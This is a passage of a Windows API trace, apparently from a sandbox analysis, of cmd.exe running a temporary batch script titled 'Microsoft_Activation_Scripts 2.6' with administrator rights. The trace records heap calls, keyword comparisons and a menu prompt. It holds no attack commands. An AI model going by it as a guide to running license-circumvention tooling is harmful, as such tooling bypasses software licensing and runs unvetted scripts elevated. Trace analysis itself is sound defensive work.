(HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0181.316] _wcsicmp (_String1="FOR", _String2="call") returned 3 [0181.316] _wcsicmp (_String1="FOR/?", _String2="call") returned 3 [0181.316] _wcsicmp (_String1="IF", _String2="call") returned 6 [0181.316] _wcsicmp (_String1="IF/?", _String2="call") returned 6 [0181.316] _wcsicmp (_String1="REM", _String2="call") returned 15 [0181.316] _wcsicmp (_String1="REM/?", _String2="call") returned 15 [0181.317] GetProcessHeap () returned 0x19a8f1e0000 [0181.317] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee790 [0181.317] GetProcessHeap () returned 0x19a8f1e0000 [0181.317] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f200f20 [0181.317] GetProcessHeap () returned 0x19a8f1e0000 [0181.317] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xd0) returned 0x19a8f1efc90 [0181.317] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.317] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x567b7 [0181.317] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe530, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe530*=0x1fff, lpOverlapped=0x0) returned 1 [0181.317] SetFilePointer (in: hFile=0x9c, lDistanceToMove=354234, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x567ba [0181.317] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=")\r\nl :batcol %~1 \"%~2\" %~3 \"%~4\"\r\n[0m\r\nreen% \"Enter a menu option in the Keyboard [1,2,3,4,5,6,7,8,0] :\"\r\n================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 3 [0181.317] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.317] GetFileType (hFile=0x9c) returned 0x1 [0181.317] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.317] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x567ba [0181.317] GetProcessHeap () returned 0x19a8f1e0000 [0181.317] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0181.318] GetProcessHeap () returned 0x19a8f1e0000 [0181.318] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0181.318] _tell (_FileHandle=3) returned 354234 [0181.319] _close (_FileHandle=3) returned 0 [0181.319] wcstol (in: _String="1", _EndPtr=0x43f9efe840, _Radix=0 | out: _EndPtr=0x43f9efe840*="") returned 1 [0181.319] wcstol (in: _String="1", _EndPtr=0x43f9efe848, _Radix=0 | out: _EndPtr=0x43f9efe848*="") returned 1 [0181.319] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efe4d0, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0181.320] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0181.320] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0181.320] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0181.320] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0181.320] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0181.320] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0181.320] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0181.320] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0181.320] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0181.320] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0181.320] GetProcessHeap () returned 0x19a8f1e0000 [0181.320] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x174) returned 0x19a8f1f0370 [0181.320] GetProcessHeap () returned 0x19a8f1e0000 [0181.320] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f0370, Size=0xb0) returned 0x19a8f1f0370 [0181.320] GetProcessHeap () returned 0x19a8f1e0000 [0181.320] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f0370) returned 0xb0 [0181.320] GetProcessHeap () returned 0x19a8f1e0000 [0181.320] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xcc) returned 0x19a8f1f00f0 [0181.320] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x43f9efe268 | out: _Buffer="\x1b[40;37m \x1b[40;92mEnter a menu option in the Keyboard [1,2,3,4,5,6,7,8,0] :\x1b[0m\r\n") returned 89 [0181.320] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.320] GetFileType (hFile=0x24) returned 0x2 [0181.320] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0181.320] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe1e8 | out: lpMode=0x43f9efe1e8) returned 1 [0181.321] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.321] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x7ff7bd731b60*, nNumberOfCharsToWrite=0x59, lpNumberOfCharsWritten=0x43f9efe228, lpReserved=0x0 | out: lpBuffer=0x7ff7bd731b60*, lpNumberOfCharsWritten=0x43f9efe228*=0x59) returned 1 [0181.328] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.328] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0181.328] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.328] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0181.329] _get_osfhandle (_FileHandle=0) returned 0x20 [0181.329] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0181.329] SetConsoleInputExeNameW () returned 0x1 [0181.330] GetConsoleOutputCP () returned 0x1b5 [0181.330] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0181.330] SetThreadUILanguage (LangId=0x0) returned 0x409 [0181.331] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efe870, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0181.331] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0181.331] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.331] SetFilePointer (in: hFile=0x9c, lDistanceToMove=354234, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x567ba [0181.331] GetProcessHeap () returned 0x19a8f1e0000 [0181.332] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f00f0) returned 1 [0181.332] GetProcessHeap () returned 0x19a8f1e0000 [0181.332] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0370) returned 1 [0181.332] GetProcessHeap () returned 0x19a8f1e0000 [0181.333] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1efc90) returned 1 [0181.333] GetProcessHeap () returned 0x19a8f1e0000 [0181.333] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200f20) returned 1 [0181.333] GetProcessHeap () returned 0x19a8f1e0000 [0181.333] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee790) returned 1 [0181.333] GetProcessHeap () returned 0x19a8f1e0000 [0181.333] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5ef0) returned 1 [0181.333] GetProcessHeap () returned 0x19a8f1e0000 [0181.334] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea980) returned 1 [0181.334] GetProcessHeap () returned 0x19a8f1e0000 [0181.334] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200ef0) returned 1 [0181.334] GetProcessHeap () returned 0x19a8f1e0000 [0181.334] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200ec0) returned 1 [0181.334] GetProcessHeap () returned 0x19a8f1e0000 [0181.335] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f201190) returned 1 [0181.335] GetProcessHeap () returned 0x19a8f1e0000 [0181.335] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2010a0) returned 1 [0181.335] GetProcessHeap () returned 0x19a8f1e0000 [0181.335] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2012b0) returned 1 [0181.335] GetProcessHeap () returned 0x19a8f1e0000 [0181.335] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200f80) returned 1 [0181.335] GetProcessHeap () returned 0x19a8f1e0000 [0181.336] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee850) returned 1 [0181.336] GetProcessHeap () returned 0x19a8f1e0000 [0181.336] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f201250) returned 1 [0181.336] GetProcessHeap () returned 0x19a8f1e0000 [0181.336] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea8b0) returned 1 [0181.336] GetProcessHeap () returned 0x19a8f1e0000 [0181.336] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f201460) returned 1 [0181.336] GetProcessHeap () returned 0x19a8f1e0000 [0181.337] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee490) returned 1 [0181.337] GetProcessHeap () returned 0x19a8f1e0000 [0181.337] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ead30) returned 1 [0181.337] GetProcessHeap () returned 0x19a8f1e0000 [0181.337] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaca0) returned 1 [0181.337] GetProcessHeap () returned 0x19a8f1e0000 [0181.337] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f201550) returned 1 [0181.337] GetProcessHeap () returned 0x19a8f1e0000 [0181.338] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb980) returned 1 [0181.338] GetProcessHeap () returned 0x19a8f1e0000 [0181.338] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb770) returned 1 [0181.338] GetProcessHeap () returned 0x19a8f1e0000 [0181.338] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0181.338] GetProcessHeap () returned 0x19a8f1e0000 [0181.339] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb950) returned 1 [0181.339] GetProcessHeap () returned 0x19a8f1e0000 [0181.339] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0181.339] GetProcessHeap () returned 0x19a8f1e0000 [0181.339] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee250) returned 1 [0181.339] GetProcessHeap () returned 0x19a8f1e0000 [0181.339] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec7a0) returned 1 [0181.339] GetProcessHeap () returned 0x19a8f1e0000 [0181.339] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecd60) returned 1 [0181.339] GetProcessHeap () returned 0x19a8f1e0000 [0181.339] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec6c0) returned 1 [0181.339] GetProcessHeap () returned 0x19a8f1e0000 [0181.340] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edb90) returned 1 [0181.340] GetProcessHeap () returned 0x19a8f1e0000 [0181.340] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec940) returned 1 [0181.340] GetProcessHeap () returned 0x19a8f1e0000 [0181.340] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec920) returned 1 [0181.340] GetProcessHeap () returned 0x19a8f1e0000 [0181.340] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee3d0) returned 1 [0181.341] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.341] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x567ba [0181.341] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe830, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe830*=0x1fff, lpOverlapped=0x0) returned 1 [0181.341] SetFilePointer (in: hFile=0x9c, lDistanceToMove=354243, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x567c3 [0181.341] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="exit /b\r\n", cbMultiByte=9, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="exit /b\r\ncol %~1 \"%~2\" %~3 \"%~4\"\r\n[0m\r\nreen% \"Enter a menu option in the Keyboard [1,2,3,4,5,6,7,8,0] :\"\r\n================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 9 [0181.341] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.341] GetFileType (hFile=0x9c) returned 0x1 [0181.341] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.341] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x567c3 [0181.341] GetProcessHeap () returned 0x19a8f1e0000 [0181.341] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0181.341] GetProcessHeap () returned 0x19a8f1e0000 [0181.342] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0181.342] _wcsicmp (_String1="exit", _String2=")") returned 60 [0181.342] _wcsicmp (_String1="FOR", _String2="exit") returned 1 [0181.342] _wcsicmp (_String1="FOR/?", _String2="exit") returned 1 [0181.342] _wcsicmp (_String1="IF", _String2="exit") returned 4 [0181.342] _wcsicmp (_String1="IF/?", _String2="exit") returned 4 [0181.342] _wcsicmp (_String1="REM", _String2="exit") returned 13 [0181.342] _wcsicmp (_String1="REM/?", _String2="exit") returned 13 [0181.342] GetProcessHeap () returned 0x19a8f1e0000 [0181.342] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee250 [0181.342] GetProcessHeap () returned 0x19a8f1e0000 [0181.342] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb710 [0181.343] GetProcessHeap () returned 0x19a8f1e0000 [0181.343] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec880 [0181.343] _tell (_FileHandle=3) returned 354243 [0181.343] _close (_FileHandle=3) returned 0 [0181.343] _wcsicmp (_String1="exit", _String2="DIR") returned 1 [0181.343] _wcsicmp (_String1="exit", _String2="ERASE") returned 6 [0181.343] _wcsicmp (_String1="exit", _String2="DEL") returned 1 [0181.343] _wcsicmp (_String1="exit", _String2="TYPE") returned -15 [0181.343] _wcsicmp (_String1="exit", _String2="COPY") returned 2 [0181.343] _wcsicmp (_String1="exit", _String2="CD") returned 2 [0181.343] _wcsicmp (_String1="exit", _String2="CHDIR") returned 2 [0181.343] _wcsicmp (_String1="exit", _String2="RENAME") returned -13 [0181.343] _wcsicmp (_String1="exit", _String2="REN") returned -13 [0181.343] _wcsicmp (_String1="exit", _String2="ECHO") returned 21 [0181.343] _wcsicmp (_String1="exit", _String2="SET") returned -14 [0181.343] _wcsicmp (_String1="exit", _String2="PAUSE") returned -11 [0181.343] _wcsicmp (_String1="exit", _String2="DATE") returned 1 [0181.343] _wcsicmp (_String1="exit", _String2="TIME") returned -15 [0181.343] _wcsicmp (_String1="exit", _String2="PROMPT") returned -11 [0181.344] _wcsicmp (_String1="exit", _String2="MD") returned -8 [0181.344] _wcsicmp (_String1="exit", _String2="MKDIR") returned -8 [0181.344] _wcsicmp (_String1="exit", _String2="RD") returned -13 [0181.344] _wcsicmp (_String1="exit", _String2="RMDIR") returned -13 [0181.344] _wcsicmp (_String1="exit", _String2="PATH") returned -11 [0181.344] _wcsicmp (_String1="exit", _String2="GOTO") returned -2 [0181.344] _wcsicmp (_String1="exit", _String2="SHIFT") returned -14 [0181.344] _wcsicmp (_String1="exit", _String2="CLS") returned 2 [0181.344] _wcsicmp (_String1="exit", _String2="CALL") returned 2 [0181.344] _wcsicmp (_String1="exit", _String2="VERIFY") returned -17 [0181.344] _wcsicmp (_String1="exit", _String2="VER") returned -17 [0181.344] _wcsicmp (_String1="exit", _String2="VOL") returned -17 [0181.344] _wcsicmp (_String1="exit", _String2="EXIT") returned 0 [0181.344] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efe620, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0181.366] _wcsicmp (_String1="exit", _String2="DIR") returned 1 [0181.366] _wcsicmp (_String1="exit", _String2="ERASE") returned 6 [0181.366] _wcsicmp (_String1="exit", _String2="DEL") returned 1 [0181.366] _wcsicmp (_String1="exit", _String2="TYPE") returned -15 [0181.366] _wcsicmp (_String1="exit", _String2="COPY") returned 2 [0181.366] _wcsicmp (_String1="exit", _String2="CD") returned 2 [0181.366] _wcsicmp (_String1="exit", _String2="CHDIR") returned 2 [0181.367] _wcsicmp (_String1="exit", _String2="RENAME") returned -13 [0181.367] _wcsicmp (_String1="exit", _String2="REN") returned -13 [0181.367] _wcsicmp (_String1="exit", _String2="ECHO") returned 21 [0181.367] _wcsicmp (_String1="exit", _String2="SET") returned -14 [0181.367] _wcsicmp (_String1="exit", _String2="PAUSE") returned -11 [0181.367] _wcsicmp (_String1="exit", _String2="DATE") returned 1 [0181.367] _wcsicmp (_String1="exit", _String2="TIME") returned -15 [0181.367] _wcsicmp (_String1="exit", _String2="PROMPT") returned -11 [0181.367] _wcsicmp (_String1="exit", _String2="MD") returned -8 [0181.367] _wcsicmp (_String1="exit", _String2="MKDIR") returned -8 [0181.367] _wcsicmp (_String1="exit", _String2="RD") returned -13 [0181.367] _wcsicmp (_String1="exit", _String2="RMDIR") returned -13 [0181.367] _wcsicmp (_String1="exit", _String2="PATH") returned -11 [0181.367] _wcsicmp (_String1="exit", _String2="GOTO") returned -2 [0181.367] _wcsicmp (_String1="exit", _String2="SHIFT") returned -14 [0181.367] _wcsicmp (_String1="exit", _String2="CLS") returned 2 [0181.367] _wcsicmp (_String1="exit", _String2="CALL") returned 2 [0181.367] _wcsicmp (_String1="exit", _String2="VERIFY") returned -17 [0181.367] _wcsicmp (_String1="exit", _String2="VER") returned -17 [0181.367] _wcsicmp (_String1="exit", _String2="VOL") returned -17 [0181.367] _wcsicmp (_String1="exit", _String2="EXIT") returned 0 [0181.367] GetProcessHeap () returned 0x19a8f1e0000 [0181.367] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb950 [0181.367] GetProcessHeap () returned 0x19a8f1e0000 [0181.368] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb950, Size=0x1a) returned 0x19a8f1eb980 [0181.368] GetProcessHeap () returned 0x19a8f1e0000 [0181.368] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb980) returned 0x1a [0181.368] GetProcessHeap () returned 0x19a8f1e0000 [0181.368] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x22) returned 0x19a8f1eb6e0 [0181.368] _wcsnicmp (_String1="/b", _String2="/B", _MaxCount=0x2) returned 0 [0181.368] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efe080, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0181.368] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0181.368] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.368] SetFilePointer (in: hFile=0x9c, lDistanceToMove=354243, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x567c3 [0181.368] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.368] GetFileSize (in: hFile=0x9c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6d9ee [0181.368] _wcsnicmp (_String1=":EOF", _String2=":EOF", _MaxCount=0x4) returned 0 [0181.368] _close (_FileHandle=3) returned 0 [0181.369] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.369] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0181.369] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.369] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0181.370] _get_osfhandle (_FileHandle=0) returned 0x20 [0181.370] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0181.370] SetConsoleInputExeNameW () returned 0x1 [0181.370] GetConsoleOutputCP () returned 0x1b5 [0181.371] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0181.371] SetThreadUILanguage (LangId=0x0) returned 0x409 [0181.371] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efe870, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0181.371] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0181.371] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.371] SetFilePointer (in: hFile=0x9c, lDistanceToMove=449006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6d9ee [0181.371] GetProcessHeap () returned 0x19a8f1e0000 [0181.372] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0181.372] GetProcessHeap () returned 0x19a8f1e0000 [0181.372] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb980) returned 1 [0181.372] GetProcessHeap () returned 0x19a8f1e0000 [0181.372] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec880) returned 1 [0181.372] GetProcessHeap () returned 0x19a8f1e0000 [0181.372] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0181.372] GetProcessHeap () returned 0x19a8f1e0000 [0181.373] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee250) returned 1 [0181.373] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.373] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6d9ee [0181.373] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe830, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe830*=0x0, lpOverlapped=0x0) returned 1 [0181.373] GetLastError () returned 0x0 [0181.373] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.373] GetFileType (hFile=0x9c) returned 0x1 [0181.373] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.374] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6d9ee [0181.374] GetProcessHeap () returned 0x19a8f1e0000 [0181.374] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0181.374] GetProcessHeap () returned 0x19a8f1e0000 [0181.374] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0181.375] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.375] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6d9ee [0181.375] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe830, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe830*=0x0, lpOverlapped=0x0) returned 1 [0181.375] GetLastError () returned 0x0 [0181.375] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.375] GetFileType (hFile=0x9c) returned 0x1 [0181.375] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.375] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6d9ee [0181.375] GetProcessHeap () returned 0x19a8f1e0000 [0181.375] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0181.375] GetProcessHeap () returned 0x19a8f1e0000 [0181.376] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0181.377] longjmp () [0181.377] _tell (_FileHandle=3) returned 449006 [0181.377] _close (_FileHandle=3) returned 0 [0181.377] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.377] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0181.377] _get_osfhandle (_FileHandle=1) returned 0x24 [0181.377] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0181.378] _get_osfhandle (_FileHandle=0) returned 0x20 [0181.378] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0181.379] SetConsoleInputExeNameW () returned 0x1 [0181.379] GetConsoleOutputCP () returned 0x1b5 [0181.379] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0181.379] SetThreadUILanguage (LangId=0x0) returned 0x409 [0181.380] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0181.380] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0181.380] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.380] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10090, lpDistanceToMoveHigh=0x0, 